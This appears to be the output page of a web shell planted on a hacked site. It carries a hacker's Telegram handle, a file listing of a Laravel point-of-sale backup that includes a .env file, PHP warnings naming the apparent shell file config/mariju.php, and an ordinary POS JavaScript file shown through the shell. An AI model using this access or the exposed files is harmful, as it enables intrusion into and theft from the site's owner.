telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log11725355 KBJuly 18 2025 12:27:480644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
$(document).ready(function() { //For edit pos form if ($('form#sell_return_form').length > 0) { pos_form_obj = $('form#sell_return_form'); } else { pos_form_obj = $('form#add_pos_sell_form'); } if ($('form#sell_return_form').length > 0 || $('form#add_pos_sell_form').length > 0) { initialize_printer(); } //Date picker $('#transaction_date').datetimepicker({ format: moment_date_format + ' ' + moment_time_format, ignoreReadonly: true, }); pos_form_validator = pos_form_obj.validate({ submitHandler: function(form) { var cnf = true; if (cnf) { var data = $(form).serialize(); var url = $(form).attr('action'); $.ajax({ method: 'POST', url: url, data: data, dataType: 'json', success: function(result) { if (result.success == 1) { toastr.success(result.msg); //Check if enabled or not if (result.receipt.is_enabled) { pos_print(result.receipt); } } else { toastr.error(result.msg); } }, }); } return false; }, }); }); function initialize_printer() { if ($('input#location_id').data('receipt_printer_type') == 'printer') { initializeSocket(); } } function pos_print(receipt) { //If printer type then connect with websocket if (receipt.print_type == 'printer') { var content = receipt; content.type = 'print-receipt'; //Check if ready or not, then print. if (socket.readyState != 1) { initializeSocket(); setTimeout(function() { socket.send(JSON.stringify(content)); }, 700); } else { socket.send(JSON.stringify(content)); } } else if (receipt.html_content != '') { var title = document.title; if (typeof receipt.print_title != 'undefined') { document.title = receipt.print_title; } //If printer type browser then print content $('#receipt_section').html(receipt.html_content); __currency_convert_recursively($('#receipt_section')); setTimeout(function() { window.print(); document.title = title; }, 1000); } } // //Set the location and initialize printer // function set_location(){ // if($('input#location_id').length == 1){ // $('input#location_id').val($('select#select_location_id').val()); // //$('input#location_id').data('receipt_printer_type', $('select#select_location_id').find(':selected').data('receipt_printer_ty // } // if($('input#location_id').val()){ // $('input#search_product').prop( "disabled", false ).focus(); // } else { // $('input#search_product').prop( "disabled", true ); // } // initialize_printer(); // }